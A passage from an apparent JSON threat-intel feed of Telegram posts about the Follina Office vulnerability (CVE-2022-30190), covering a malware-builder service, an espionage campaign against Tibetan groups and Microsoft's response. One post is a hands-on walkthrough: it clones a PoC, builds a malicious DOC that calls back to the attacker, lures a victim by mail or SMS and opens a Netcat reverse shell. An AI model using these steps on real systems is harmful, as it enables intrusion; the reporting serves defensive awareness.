\u043a\u043b\u0438\u0435\u043d\u0442\u044b MLNK Builder \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e, \u043d\u043e \u0430\u0432\u0442\u043e\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0434\u043b\u044f \u0443\u0437\u043a\u043e\u0433\u043e \u043a\u0440\u0443\u0433\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0441 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0435\u0439 \u043f\u043e \u0446\u0435\u043d\u0435 125 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432 \u0437\u0430 \u0441\u0431\u043e\u0440\u043a\u0443.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0431\u043e\u0433\u0430\u0442\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0434 Microsoft Word, Adobe PDF, ZIP, JPG/.PNG, MP3 \u0438 \u0434\u0430\u0436\u0435 AVI, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0442\u0432\u043e\u0440\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e\u0434\u0445\u043e\u0434 \u0434\u043b\u044f \u043e\u0431\u043c\u0430\u043d\u0430 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u044e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0444\u043e\u0440\u043c\u0430\u0442\u043e\u0432 \u0444\u0430\u0439\u043b\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Living Off the Land (LOLbins).\n\n\u0421\u0440\u0435\u0434\u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 LNK \u0448\u0442\u0430\u043c\u043c\u043e\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e Resecurity \u0432\u044b\u0434\u0435\u043b\u044f\u044e\u0442 TA570\u00a0Qakbot\u00a0(Qbot), IcedID, AsyncRAT\u00a0\u0438 Emotet. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e Qakbot \u0442\u0430\u043a\u0436\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b Word \u0441\u00a0CVE-2022-30190 (Follina).", "creation_timestamp": "2022-07-20T12:07:09.000000Z"}, {"uuid": "5460980a-2de9-4c2f-886c-cf8df6dfad2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/crackcodes/1915", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n\n2. CVE-2021-44228: Apache Log4Shell\n\n3. CVE-2022-22965: Spring4Shell\n\n4. CVE-2022-1388: F5 BIG-IP\n\n5. CVE-2022-0609: Google Chrome zero-day\nhttps://blog.google/threat-analysis-group/countering-threats-north-korea\n6. CVE-2017-11882: Old but not forgotten - MS Office bug\n\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n\n\n9. CVE-2022-26134: Atlassian Confluence RCE flaw  \n\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2022-12-21T16:27:48.000000Z"}, {"uuid": "6458d13c-2967-4ea6-9afc-7231b57caa45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3478", "content": "\u041f\u0440\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 TA413 (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a LuckyCat), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0422\u0438\u0431\u0435\u0442\u0430 \u0432 \u0438\u0437\u0433\u043d\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u043a\u0430\u043a \u0435\u0435 \u0435\u0449\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0435\u0439.\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 APT \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0435 Sophos \u0438 Microsoft Office (CVE-2022-1040 \u0438 CVE-2022-30190) \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0440\u0430\u043d\u0435\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 LOWZERO.\n\n\u0412 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0446\u0435\u043b\u044f\u043c\u0438 \u0431\u044b\u043b\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u043e\u0431\u0449\u0438\u043d\u043e\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u043e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Recorded Future.\n\n\u0410\u0442\u0430\u043a\u0438 LuckyCat \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043b\u0438\u0446, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2020 \u0433\u043e\u0434\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a ExileRAT, Sepulcher \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 Mozilla Firefox, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0433\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 FriarFox .\n\n\u0412 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0435 Microsoft Equation Editor \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 LOWZERO. \u0412 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0443\u0442\u043e \u0437\u0430 \u0441\u0447\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 Royal Road RTF, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0440\u043e\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d \u0441\u0440\u0435\u0434\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 \u0434\u0440\u0443\u0433\u043e\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u043c \u043f\u0438\u0441\u044c\u043c\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Microsoft Word, \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043d\u043e\u0435 \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Google Firebase, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u044b\u0442\u0430\u043b\u043e\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0411\u044d\u043a\u0434\u043e\u0440 LOWZERO \u0438\u043c\u0435\u0435\u0442 \u043c\u043e\u0434\u0443\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u0441 C2, \u0435\u0441\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0443\u0433\u0440\u043e\u0437\u044b \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u043d\u0438 \u0438 \u0442\u0435 \u0436\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043b\u0435\u0442 (\u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a tseringkanyaq@yahoo[.]com \u0438 mediabureauin@gmail[.]com).\n\n\u0421\u043e \u0441\u043b\u043e\u0432 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432, \u0433\u0440\u0443\u043f\u043f\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u043b\u0430\u0433\u0430\u044f\u0441\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u043e\u0439 TTP.", "creation_timestamp": "2022-09-27T16:57:07.000000Z"}, {"uuid": "588edee4-22c6-4038-b3d1-820876ef143b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/2998", "content": "\u0418\u043c\u043f\u0435\u0440\u0438\u044f \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u043e\u0442\u0432\u0435\u0442\u043d\u044b\u0439 \u0443\u0434\u0430\u0440, \u043f\u0440\u0430\u0432\u0434\u0430 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e \u0432 \u043a\u0430\u043a\u0443\u044e \u0441\u0442\u043e\u0440\u043e\u043d\u0443.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u043d\u0435\u0433\u043e\u0434\u043e\u0432\u0430\u043d\u0438\u044f Microsoft \u0432\u0441\u0435 \u0436\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2022-30190, \u043e\u0446\u0435\u043d\u0438\u0432 \u0435\u0435 \u043d\u0430 7,8 \u0438\u0437 10 \u043f\u043e CVSS. \u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u044b Microsoft Office Office 2013, Office 2016, Office 2019 \u0438 Office 2021, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Professional Plus.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 (\u0437\u0434\u0435\u0441\u044c), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043f\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows, \u0447\u0442\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 Microsoft Office \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u0438\u043b\u0438 Application Guard \u0434\u043b\u044f Office \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0434\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f 12 \u0430\u043f\u0440\u0435\u043b\u044f 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0433\u0434\u0430 \u0432 \u0431\u0430\u0437\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0442\u043e\u0440\u043e\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0437\u0430\u0442\u043e\u0447\u0435\u043d \u043f\u043e\u0434 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430, \u043e \u0447\u0435\u043c \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc \u0432 \u044d\u0444\u0438\u0440 \u0440\u0430\u0434\u0438\u043e Sputnik.\n\n\u041d\u043e \u0432\u0441\u0435 \u044d\u0442\u043e \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043c\u0435\u043d\u044f\u0435\u0442 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e Microsoft \u0435\u0449\u0451 21 \u0430\u043f\u0440\u0435\u043b\u044f \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043e\u0442\u0447\u0435\u0442 \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 (\u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430) \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043d\u0435 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u0412\u043f\u0440\u043e\u0447\u0435\u043c \u0447\u0435\u043c\u0443 \u0443\u0434\u0438\u0432\u043b\u044f\u0442\u044c\u0441\u044f.", "creation_timestamp": "2022-05-31T09:10:03.000000Z"}, {"uuid": "feed85d9-e3ba-4883-b94b-4edea94de93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/YfHS_0gw6mIFdSry5hyGG3ScC-HwbDfpqg-NLNfkx1fDKy8", "content": "", "creation_timestamp": "2022-06-14T02:39:12.000000Z"}, {"uuid": "c00590bf-d0b0-4bc9-8930-4547b9574389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/professional_c_h/1745", "content": "\ud83d\udca0 Follina - Microsoft MSDTC Vulnerability\n\n \ud83d\udc49\ud83c\udffb Follina is a remote code execution vulnerability where MSDT is invoked using the URL protocol from a calling application such as Word.  An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application.  The attacker can then install programs, view, modify or delete data, or create new accounts in the context allowed by the user's rights.\n\n \ud83d\udc41 An attacker can access a user's privileges using any application or even a shell.  An attacker can install programs, view, modify, delete data, or create new accounts with user privileges.  Follina's CVE number is CVE-2022-30190.\n\n\n Exploring Follina\n\n git clone https://github.com/JohnHammond/msdt-follina\n cd msdt-follina\n python3 follina.py -i X.X.X.X\n\n \ud83d\udcac In the above command, X.X.X.X is our IP address.  This will create a malicious doc file that launches a listener for its HTML payload on port 8000. You can view the documents in the msdt-follina directory.\n\n \ud83d\udcda We need to send it to our target's Windows system.  This is where you can apply your SI to hook your target.  You can send it by mail or send a juicy SMS with a link to download a malicious DOC file.  We hosted it in our decentralized cloud storage.  (In order to use it externally, we need to use our external IP address and forward the required port).\n\n \ud83d\udc41\u200d\ud83d\udde8 Whenever our victim opens it and clicks \"Enable Editing\" in MS Word (for an older version of MS Office, this is not required, we can get them directly), we get a reverse connection to our Kali Linux, as in the screenshot  .\n\n \ud83d\udcbb But it can do much more if we create the payload with the following command, then we can even get a shell:\n\n python3 follina.py -r 7777\n\n \u2328\ufe0f In the above command we are using port 7777 to connect to the payload, here we can use any unused port.\n\n \ud83d\udc68\ud83c\udffb\u200d\ud83d\udcbb The above command will create a Netcat payload and start the listener, and it will also create a DOC file in the msdt-follina directory.  After our target clicked \"Enable Editing\", we got a shell on reconnect.\n\n \ud83d\udccc Now we can do everything that a user of the victim computer can do.  This vulnerability is unlikely to be fixed, at least in the past week.  Our article is inspired by our friend NetworkChuck's video on YouTube, we can watch his next video (we made small changes to avoid mistakes).", "creation_timestamp": "2022-09-19T18:29:16.000000Z"}, {"uuid": "32900791-2ae7-40f9-8ec9-bfdc90bf4eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/HgWi9PhIzpFYcgYzXSCS4wMGhIJqav4sX4ysQ_39jTE3yw", "content": "", "creation_timestamp": "2022-12-08T15:32:35.000000Z"}, {"uuid": "0d38acc5-2458-4402-913a-ae0fa170f7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/643", "content": 